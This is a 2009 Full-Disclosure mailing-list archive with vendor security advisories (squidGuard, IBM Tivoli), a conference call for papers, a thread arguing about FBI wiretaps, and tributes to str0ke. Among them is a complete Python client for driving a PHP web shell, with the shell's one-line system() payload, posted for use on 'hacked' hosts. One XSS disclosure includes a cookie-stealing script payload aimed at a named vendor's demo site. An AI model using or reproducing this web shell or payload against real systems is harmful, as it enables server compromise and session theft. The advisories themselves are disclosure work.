compress your talk, feel free to choose both, as it will allow us more 
flexibility in scheduling. It is most likely that Sunday will be the 30 
minute talk day, but we make no promises.

What we need from you

* Speaker name(s) and contact information.
* Presentation Title.
* Track preference and length (InfoSec or Maker, 30 or 60 minutes.)
* Keywords and 2-3 sentence abstract.
* Document in Text or PDF format which contains the following, 
preferably in order:
  o Presenter(s) Name.
  o Bio limited to 100 words for you OR your group (not 100 words per 
person.)
  o Abstract of your presentation limited to 200 words or less.
  o Detailed outline/description of your topic.
  o List of other conferences at which submission has been presented.
  o List of resources requested beyond what is already provided (power, 
projector with VGA input, sound projection, and internet connectivity.)

What you'll get for speaking

Accepted speakers will receive free admission to the conference. Since 
we're a brand new con, we don't have the funds for honorariums this 
year. We hope to be able to pull that off in the future. Alternates will 
be selected and will also receive free admission. Alternates should come 
prepared to speak.

Schedule and Updates

Please watch the website for updates: http://quahogcon.org/news/

November 2nd, 2009 - QuahogCon Call for Papers opens
December 15th, 2009 - Papers due for first round of selections
December 31st, 2009 - Final due date for submissions
January 24th, 2010 - Speaker selection announced

Submit your talk here: http://quahogcon.org/cfp/


From security at mandriva.com  Tue Nov  3 18:31:01 2009
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 03 Nov 2009 19:31:01 +0100
Subject: [Full-disclosure] [ MDVSA-2009:293 ] squidGuard
Message-ID: <E1N5O9l-0007Qv-S1@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:293
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : squidGuard
 Date    : November 3, 2009
 Affected: 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,
           Enterprise Server 5.0, Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been found and corrected in squidGuard:
 
 Buffer overflow in sgLog.c in squidGuard 1.3 and 1.4 allows remote
 attackers to cause a denial of service (application hang or loss of
 blocking functionality) via a long URL with many / (slash) characters,
 related to emergency mode. (CVE-2009-3700).
 
 Multiple buffer overflows in squidGuard 1.4 allow remote attackers
 to bypass intended URL blocking via a long URL, related to (1)
 the relationship between a certain buffer size in squidGuard and a
 certain buffer size in Squid and (2) a redirect URL that contains
 information about the originally requested URL (CVE-2009-3826).
 
 squidGuard was upgraded to 1.2.1 for MNF2/CS3/CS4 with additional
 upstream security and bug fixes patches applied.
 
 This update fixes these vulnerabilities.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3700
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3826
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 d51a6de0eb876804fcb7ebc8e5bc671f  2009.0/i586/squidGuard-1.3-1.1mdv2009.0.i586.rpm 
 5b9e436cb1866b66a59789f9d0147be7  2009.0/SRPMS/squidGuard-1.3-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 c8ce4727e7a7a062196616102ac03c75  2009.0/x86_64/squidGuard-1.3-1.1mdv2009.0.x86_64.rpm 
 5b9e436cb1866b66a59789f9d0147be7  2009.0/SRPMS/squidGuard-1.3-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 77efe541c81811d47c695f3189e583e7  2009.1/i586/squidGuard-1.4-1.1mdv2009.1.i586.rpm 
 c057b45049ed4655fc367fdad7b492ba  2009.1/SRPMS/squidGuard-1.4-1.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 02d9b40ba619f24376842ccdcb85a8be  2009.1/x86_64/squidGuard-1.4-1.1mdv2009.1.x86_64.rpm 
 c057b45049ed4655fc367fdad7b492ba  2009.1/SRPMS/squidGuard-1.4-1.1mdv2009.1.src.rpm

 Corporate 3.0:
 1a6ff7e05b3867f666234dd4b511e89b  corporate/3.0/i586/squidGuard-1.2.1-0.1.C30mdk.i586.rpm 
 da035e0175561ee84c7ea900b504e1f5  corporate/3.0/SRPMS/squidGuard-1.2.1-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 dd3e63730283d91df564fd9dfe436c75  corporate/3.0/x86_64/squidGuard-1.2.1-0.1.C30mdk.x86_64.rpm 
 da035e0175561ee84c7ea900b504e1f5  corporate/3.0/SRPMS/squidGuard-1.2.1-0.1.C30mdk.src.rpm

 Corporate 4.0:
 a5b7580f7288482f5ea87e0a7903085d  corporate/4.0/i586/squidGuard-1.2.1-0.1.20060mlcs4.i586.rpm 
 41e551a07f381020d18bcf19d5aabbc8  corporate/4.0/SRPMS/squidGuard-1.2.1-0.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 0e4dce779010bc97bfb40dd46511e61c  corporate/4.0/x86_64/squidGuard-1.2.1-0.1.20060mlcs4.x86_64.rpm 
 41e551a07f381020d18bcf19d5aabbc8  corporate/4.0/SRPMS/squidGuard-1.2.1-0.1.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 5a5aaf6bfffcae9a3f736da5de946f6a  mes5/i586/squidGuard-1.4-0.2mdvmes5.i586.rpm 
 bfa391098ac9298228fa7bb9a660e80e  mes5/SRPMS/squidGuard-1.4-0.2mdvmes5.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 fdc0804c49ac90683d16fcc5941fcbf5  mes5/x86_64/squidGuard-1.4-0.2mdvmes5.x86_64.rpm 
 bfa391098ac9298228fa7bb9a660e80e  mes5/SRPMS/squidGuard-1.4-0.2mdvmes5.src.rpm

 Multi Network Firewall 2.0:
 cbd56a801cc68478bf6348ce0b5193d1  mnf/2.0/i586/squidGuard-1.2.1-0.1.C30mdk.i586.rpm 
 358ec35776e7a4c7062bcb936e8f2a1e  mnf/2.0/SRPMS/squidGuard-1.2.1-0.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFK8EkEmqjQ0CJFipgRAu7FAKCrcgmFNIq2/iAiBqEKIw51i968iQCfSNAU
PhPo0Nnvv+KDCrRbbaKu1Z8=
=i2KW
-----END PGP SIGNATURE-----


From megumi1990 at gmail.com  Tue Nov  3 23:57:21 2009
From: megumi1990 at gmail.com (Megumi Yanagishita)
Date: Wed, 4 Nov 2009 07:57:21 +0800
Subject: [Full-disclosure] KCSEC-00000001-ServUWebClient
In-Reply-To: <F2083DB214264A2F8E1C82EEE0F319EC@PC1>
References: <F2083DB214264A2F8E1C82EEE0F319EC@PC1>
Message-ID: <4fd563920911031557j42fca5fbl53f745613727d403@mail.gmail.com>

If you are about to exploit this bug with ollydbg and a /SafeSEH scanner
plug-in which could be found at:

http://www.openrce.org/downloads/details/244/OllySSEH

I think you may need to change line 516 of ollysseh.c from *free(lpDD);* to
*else free(lpLCD);* and re-compile it. Or you may find your ollydbg
crashes once it runs the original OllySSEH.dll plug-in.

Thanks,
M. Yanagishita

On Mon, Nov 2, 2009 at 6:18 AM, Nikolaos Rangos <nikolaos at rangos.de> wrote:

> Hello list, the vulnerability named "RhinoSoft.com Serv-U 9.0.0.5 WebClient
> Remote Buffer Overflow"
> can be found at http://www.rangos.de/ServU-ADV.txt.
>
> Best Regards,
>
> Nikolaos Rangos
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091104/4e564dc6/attachment.html 

From bugsnothugs at gmail.com  Wed Nov  4 00:21:11 2009
From: bugsnothugs at gmail.com (Bugs NotHugs)
Date: Tue, 3 Nov 2009 17:21:11 -0700
Subject: [Full-disclosure] Bractus SunTrack Multiple XSS
Message-ID: <63ac005e0911031621g4f40cc56hb89b837189c6b8a8@mail.gmail.com>

Vendor: Bractus (http://bract.us)
Product: SunTrack (http://bract.us/demo/login.jsp)

Multiple stored XSS vulnerabilities exist in the Bractus SunTrack
courier software suite.

Affected scripts:
newprofile.html (title parameter)
signup/signup.html (firstname, lastname, company parameter)
contact.html (firstname, lastname, address[0].street1 parameter)

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account


From bugsnothugs at gmail.com  Wed Nov  4 00:20:06 2009
From: bugsnothugs at gmail.com (Bugs NotHugs)
Date: Tue, 3 Nov 2009 17:20:06 -0700
Subject: [Full-disclosure] e-Courier Tracking Site Multiple Script UserGUID
	Parameter XSS
Message-ID: <63ac005e0911031620p1e3edb2qd3b9ed427def42c6@mail.gmail.com>

Vendor: e-Courier (http://www.ecouriersoftware.com/)
Product: CMS Tracking Site Issue: Cross-Site Scripting.
Description: Nearly all pages include the URI Parameter UserGUID,
which is not sanitized before being included in the response.

Example:
https://demo.e-courier.com/demo/home/index.asp?UserGUID="><script>alert(document.cookie)</script>

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account


From ivanhec at gmail.com  Wed Nov  4 01:55:45 2009
From: ivanhec at gmail.com (Ivan .)
Date: Wed, 4 Nov 2009 12:55:45 +1100
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
Message-ID: <6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>

The answer is both more mundane and more alarming. Prosecutors are
using the FBI's massive surveillance system, DCSNet, which stands for
Digital Collection System Network. According to Wired magazine, this
system connects FBI wiretapping rooms to switches controlled by
traditional land-line operators, internet-telephony providers and
cellular companies. It can be used to instantly wiretap almost any
communications device in the U.S. ? wireless or tethered.

http://www.wallstreetandtech.com/blog/archives/2009/10/how_prosecutors.html;jsessionid=ABTR4HPERGBDFQE1GHPCKHWATMY32JVN


From pschmehl_lists at tx.rr.com  Wed Nov  4 04:13:24 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Tue, 03 Nov 2009 22:13:24 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
Message-ID: <94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>

--On November 4, 2009 12:55:45 PM +1100 "Ivan ." <ivanhec at gmail.com> wrote:

> The answer is both more mundane and more alarming. Prosecutors are
> using the FBI's massive surveillance system, DCSNet, which stands for
> Digital Collection System Network. According to Wired magazine, this
> system connects FBI wiretapping rooms to switches controlled by
> traditional land-line operators, internet-telephony providers and
> cellular companies. It can be used to instantly wiretap almost any
> communications device in the U.S. ? wireless or tethered.
>
> http://www.wallstreetandtech.com/blog/archives/2009/10/how_prosecutors.h
> tml;jsessionid=ABTR4HPERGBDFQE1GHPCKHWATMY32JVN
>

Of course, without a warrant they can't wiretap anything.  Furthermore 
every warrant to wiretap has to be accompanied by evidence that justifies 
the warrant and signed by a federal judge who agrees that there is 
sufficient cause for the wiretap, and illegal wiretaps will not only get 
your case thrown out of court but your butt thrown in jail as well.

But other than that, it's really troubling....

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From hso at nosneros.net  Wed Nov  4 04:39:06 2009
From: hso at nosneros.net (Holt Sorenson)
Date: Wed, 4 Nov 2009 04:39:06 +0000
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
Message-ID: <20091104043906.GE6450@nosneros.net>

On Tue, Nov 03, 2009 at 10:13:24PM -0600, Paul Schmehl wrote:
>Of course, without a warrant they can't wiretap anything.  Furthermore 
>every warrant to wiretap has to be accompanied by evidence that justifies 
>the warrant and signed by a federal judge who agrees that there is 
>sufficient cause for the wiretap, and illegal wiretaps will not only get 
>your case thrown out of court but your butt thrown in jail as well.
>
>But other than that, it's really troubling....

um, have you been off planet for the last 8 years or something?
http://bit.ly/Cpwam
http://bit.ly/2AMX6O
http://bit.ly/guIGS
http://bit.ly/vKLgB
http://bit.ly/L6xP7
http://bit.ly/18chv

-- 
Holt Sorenson
hso at nosneros.net
www.nosneros.net/hso


From frank2 at dc949.org  Wed Nov  4 04:46:13 2009
From: frank2 at dc949.org (frank^2)
Date: Tue, 3 Nov 2009 20:46:13 -0800
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
Message-ID: <8d79f4b50911032046q3d53bbfbj7170a2101e09e916@mail.gmail.com>

On Tue, Nov 3, 2009 at 8:13 PM, Paul Schmehl <pschmehl_lists at tx.rr.com> wrote:
> Of course, without a warrant they can't wiretap anything.

good troll.


From kurt.buff at gmail.com  Wed Nov  4 05:50:10 2009
From: kurt.buff at gmail.com (Kurt Buff)
Date: Tue, 3 Nov 2009 21:50:10 -0800
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
Message-ID: <a9f4a3860911032150u475b9af4ne152379f8bee6cc9@mail.gmail.com>

On Tue, Nov 3, 2009 at 20:13, Paul Schmehl <pschmehl_lists at tx.rr.com> wrote:
> --On November 4, 2009 12:55:45 PM +1100 "Ivan ." <ivanhec at gmail.com> wrote:
>
>> The answer is both more mundane and more alarming. Prosecutors are
>> using the FBI's massive surveillance system, DCSNet, which stands for
>> Digital Collection System Network. According to Wired magazine, this
>> system connects FBI wiretapping rooms to switches controlled by
>> traditional land-line operators, internet-telephony providers and
>> cellular companies. It can be used to instantly wiretap almost any
>> communications device in the U.S. ? wireless or tethered.
>>
>> http://www.wallstreetandtech.com/blog/archives/2009/10/how_prosecutors.h
>> tml;jsessionid=ABTR4HPERGBDFQE1GHPCKHWATMY32JVN
>>
>
> Of course, without a warrant they can't wiretap anything.

Really? Do tell. Hope your sarcasm meter is pegged here.

>?Furthermore
> every warrant to wiretap has to be accompanied by evidence that justifies
> the warrant and signed by a federal judge who agrees that there is
> sufficient cause for the wiretap, and illegal wiretaps will not only get
> your case thrown out of court but your butt thrown in jail as well.

Except when it doesn't.

> But other than that, it's really troubling....

As it should be. I don't trust Feds as far as I can spit when it comes
to this sort of stuff.

Kurt


From Valdis.Kletnieks at vt.edu  Wed Nov  4 04:52:28 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 03 Nov 2009 23:52:28 -0500
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: Your message of "Tue, 03 Nov 2009 22:13:24 CST."
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
Message-ID: <16583.1257310348@turing-police.cc.vt.edu>

On Tue, 03 Nov 2009 22:13:24 CST, Paul Schmehl said:
> Of course, without a warrant they can't wiretap anything.  Furthermore 
> every warrant to wiretap has to be accompanied by evidence that justifies 
> the warrant and signed by a federal judge who agrees that there is 
> sufficient cause for the wiretap, and illegal wiretaps will not only get 
> your case thrown out of court but your butt thrown in jail as well.

You're new here, aren't you? :)

We're talking here about the FBI, which has had problems with their abuse
of surveillance from J Edgar Hoover's early years up to the recent problems
with abuses of NSLs.  And you expect us to believe they'll toe the line
when using this surveillance ability?

Oh, and how much time did J Edgar spend in jail for his illegal wiretaps?
And how much time will anybody spend in jail for the NSL abuses?
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091103/bcc21f5d/attachment.bin 

From wh1t3h4t3 at yahoo.co.uk  Wed Nov  4 13:19:00 2009
From: wh1t3h4t3 at yahoo.co.uk (Micheal Turner)
Date: Wed, 4 Nov 2009 13:19:00 +0000 (GMT)
Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
Message-ID: <915621.4032.qm@web24203.mail.ird.yahoo.com>

We are mourning a good friend today. I first begun talking to str0ke when I started publishing exploit codes onto this mailing list, he would always be polite and friendly in his emails. I got to know him over the years and am saddened by his departure, he contributed to the exploit scene and hacking subculture in a huge way. The last time I talked with him I asked him if I could interview him for my blog, he laughed and said he should be interviewing the exploit writers since he didnt do anything. That was str0ke and str0ke did alot, he always fought for the rights of the exploit developers and his website was the bread and butter of many a hackers day. He will sadly be missed by many people, hackers & friends.


At least now we can post exploits without that damn // milw0rm.com comment being added to the end!!! ;-) I joke, this code is dedicated to you str0ke. R.I.P my friend.


http://www.hackerfantastic.com/archive/exploits/prdelka-vs-APPLE-ptracepanic.c



      


From w3bd3vil at gmail.com  Wed Nov  4 13:39:33 2009
From: w3bd3vil at gmail.com (webDEViL)
Date: Wed, 4 Nov 2009 19:09:33 +0530
Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
In-Reply-To: <915621.4032.qm@web24203.mail.ird.yahoo.com>
References: <915621.4032.qm@web24203.mail.ird.yahoo.com>
Message-ID: <8656dcd50911040539r734857c8y2d667e7a50673413@mail.gmail.com>

A very sad news indeed.


On Wed, Nov 4, 2009 at 6:49 PM, Micheal Turner <wh1t3h4t3 at yahoo.co.uk>wrote:

> We are mourning a good friend today. I first begun talking to str0ke when I
> started publishing exploit codes onto this mailing list, he would always be
> polite and friendly in his emails. I got to know him over the years and am
> saddened by his departure, he contributed to the exploit scene and hacking
> subculture in a huge way. The last time I talked with him I asked him if I
> could interview him for my blog, he laughed and said he should be
> interviewing the exploit writers since he didnt do anything. That was str0ke
> and str0ke did alot, he always fought for the rights of the exploit
> developers and his website was the bread and butter of many a hackers day.
> He will sadly be missed by many people, hackers & friends.
>
>
> At least now we can post exploits without that damn // milw0rm.com comment
> being added to the end!!! ;-) I joke, this code is dedicated to you str0ke.
> R.I.P my friend.
>
>
>
> http://www.hackerfantastic.com/archive/exploits/prdelka-vs-APPLE-ptracepanic.c
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091104/9766bd33/attachment.html 

From malformation at hushmail.me  Wed Nov  4 13:41:14 2009
From: malformation at hushmail.me (malformation at hushmail.me)
Date: Thu, 05 Nov 2009 00:41:14 +1100
Subject: [Full-disclosure] Interactive HTTP GET and POST Shell -- R.I.P
	str0ke
Message-ID: <20091104134114.796FF11803D@smtp.hushmail.com>

Nothing new here, but thought this might be useful to some 
people...Tries to maintain current working directory when you use 
'cd'.

http://codepad.org/POrCafnA

R.I.P str0ke

#!/usr/bin/python
#
# Malformation's Interactive HTTP GET and POST Shell - 
fireinthehole.py
#
# Upload something like this to a php file:
# <?php if (isset($_POST["cmd"])) { system($_POST["cmd"]); } ?>
# <?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>
#
# Kisses go to .aware, OTW, STS, darkc0de, str0ke and some Aussies
# Please don't strip the credits out if you modify or redistribute.

import sys, os, time

print '''
	Malformation's Interactive HTTP GET and POST Shell
	Version - 1.0.0a

	Tries to maintain current working directory when you use 'cd'.
	
	Usage:
	\tEnter the host => hacked.com/hacked.php
	\tEnter the POST variable => cmd
	\thacked.com/hacked.php# ls -la
	\ttotal 12880
	\tdrwxr-xr-x  2 web    web        4096 2009-11-03 11:54 .
	\tdrwxr-xr-x 15 root    root        4096 2009-10-08 13:37 ..
	\t-rw-r--r--  1 web    web         481 2009-11-02 18:58 hacked.php
	\thacked.com/hacked.php# .
	\tBye.
'''

# # # # # Configuration # # # # # #
# 0 to turn off curl verbosity    #
debug = 1                         #
# # # # # # # # # # # # # # # # # #

write = 0
curl_array = ["/bin/", "/usr/bin/", "/usr/sbin/"]
curl_dirs = ""
count = 0
finalcommand = ""
dir_array = []

for i in range(0,len(curl_array)):
	if (os.path.exists(curl_array[i] + "curl")):
		count = count + 1
		curl_dirs = curl_dirs + curl_array[i] + " "

if (count == 0):
	print "Couldn't find curl. Tried looking in " + curl_dirs
	sys.exit(0)
	
try:
	if (os.path.exists("fireinthehole.txt")):
		file = open("fireinthehole.txt","a")
	else:
		file = open("fireinthehole.txt","w")
	print "Output will be saved to fireinthehole.txt"
	write = 1
except IOError:
	print "Directory not writable, output will not be saved."

try:
	host = raw_input("Enter the host => ")
	method = raw_input("GET/POST => ")
	if (method == "GET"):
		myvar = raw_input("Enter the GET variable => ")
	elif (method == "POST"):
		myvar = raw_input("Enter the POST variable => ")
	else:
		sys.exit(0)
	while True:
		mycommand = raw_input(host + "# ")
		finalcommand = ""
		if (mycommand == "."):
			print "Bye."
			sys.exit(0)
		mycommand = mycommand + "; "
		if (mycommand[0] + mycommand[1] + mycommand[2] == "cd "):
			dir_array.insert(len(dir_array) + 1, mycommand)
			if (method == "GET"):
				string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + 
"\""
			else:
				string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + 
host
			if (debug == 1):
				print string + ":\n"
			continue
		if (len(dir_array) != 0):
			for j in range(0,len(dir_array)):
				finalcommand = finalcommand + dir_array[j]
			finalcommand = finalcommand + mycommand
		if (finalcommand != ""):
			mycommand = finalcommand
		if (method == "GET"):
			string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + 
"\""
		else:
			string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host
		if (debug == 1):
			print string + ":\n"
		command = os.popen(string,"r")
		if (write == 1):
			file.write(host + "# " + mycommand + "\n")
		while(1):
			line = command.readline()
			line = line.strip()
			if line:
				print line
				if (write == 1):
					file.write(line + "\n")
			else:
				break
except KeyboardInterrupt:
	print "\nBye."
	sys.exit(0)

except:
	print "Unhandled exception"
	sys.exit(0)


From remove-vuln at secunia.com  Wed Nov  4 12:35:24 2009
From: remove-vuln at secunia.com (Secunia Research)
Date: Wed, 4 Nov 2009 13:35:24 +0100
Subject: [Full-disclosure] Secunia Research: IBM Tivoli Storage Manager CAD
	Service Buffer Overflow
Message-ID: <200911041235.nA4CZOJY001461@CA-IX-1.intnet>

====================================================================== 

                     Secunia Research 04/11/2009

      - IBM Tivoli Storage Manager CAD Service Buffer Overflow -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* IBM Tivoli Storage Manager Express Client 5.3.6.2

NOTE: Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately critical
Impact: System access
Where:  Local network

====================================================================== 
3) Vendor's Description of Software 

"Designed to provide centralized, automated data protection that can
help reduce the risks associated with data loss".

Product Link:
http://www-01.ibm.com/software/tivoli/products/storage-mgr/

====================================================================== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in IBM Tivoli Storage
Manager Client, which can be exploited by malicious people to
compromise a vulnerable system.

The vulnerability is caused by an input validation error in the CAD 
service. This can be exploited to cause a stack-based buffer overflow
by sending a specially crafted packet via TCP.

Successful exploitation allows execution of arbitrary code.

====================================================================== 
5) Solution 

Update to a fixed version.

====================================================================== 
6) Time Table 

07/11/2008 - Vendor notified.
14/11/2008 - Vendor notified (2nd attempt).
15/11/2008 - Vendor response.
04/11/2009 - Public disclosure.

====================================================================== 
7) Credits 

Discovered by Dyon Balding, Secunia Research.

====================================================================== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-4826 for the vulnerability.

====================================================================== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

====================================================================== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-51/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================


From pschmehl_lists at tx.rr.com  Wed Nov  4 18:28:24 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Wed, 04 Nov 2009 12:28:24 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <20091104043906.GE6450@nosneros.net>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<20091104043906.GE6450@nosneros.net>
Message-ID: <0B488C5AAA2312FBB201C0C7@utd65257.utdallas.edu>

--On Tuesday, November 03, 2009 22:39:06 -0600 Holt Sorenson <hso at nosneros.net> 
wrote:

>
> On Tue, Nov 03, 2009 at 10:13:24PM -0600, Paul Schmehl wrote:
>> Of course, without a warrant they can't wiretap anything.  Furthermore
>> every warrant to wiretap has to be accompanied by evidence that justifies
>> the warrant and signed by a federal judge who agrees that there is
>> sufficient cause for the wiretap, and illegal wiretaps will not only get
>> your case thrown out of court but your butt thrown in jail as well.
>>
>> But other than that, it's really troubling....
>
> um, have you been off planet for the last 8 years or something?
> http://bit.ly/Cpwam
> http://bit.ly/2AMX6O
> http://bit.ly/guIGS
> http://bit.ly/vKLgB
> http://bit.ly/L6xP7
> http://bit.ly/18chv
>

No.  But I can distinguish between an American citizen and someone living in 
America who may be involved in terrorist activity.  And so can the courts.

Can you?

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson


From pschmehl_lists at tx.rr.com  Wed Nov  4 18:30:25 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Wed, 04 Nov 2009 12:30:25 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <16583.1257310348@turing-police.cc.vt.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com> 
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu>
Message-ID: <351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>

--On Tuesday, November 03, 2009 22:52:28 -0600 Valdis.Kletnieks at vt.edu wrote:

> On Tue, 03 Nov 2009 22:13:24 CST, Paul Schmehl said:
>> Of course, without a warrant they can't wiretap anything.  Furthermore
>> every warrant to wiretap has to be accompanied by evidence that justifies
>> the warrant and signed by a federal judge who agrees that there is
>> sufficient cause for the wiretap, and illegal wiretaps will not only get
>> your case thrown out of court but your butt thrown in jail as well.
>
> You're new here, aren't you? :)
>
> We're talking here about the FBI, which has had problems with their abuse
> of surveillance from J Edgar Hoover's early years up to the recent problems
> with abuses of NSLs.  And you expect us to believe they'll toe the line
> when using this surveillance ability?
>

No, nor did I state that.  I said that illegal wiretapping will get thrown out 
of court and the perpetrators jailed.  That's a separate issue from whether or 
not agents will all act within the law.

> Oh, and how much time did J Edgar spend in jail for his illegal wiretaps?
> And how much time will anybody spend in jail for the NSL abuses?

Depends on whether anyone decides to prosecute.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson


From blsonne at halvdan.com  Wed Nov  4 18:52:45 2009
From: blsonne at halvdan.com (Byron Sonne)
Date: Wed, 04 Nov 2009 13:52:45 -0500
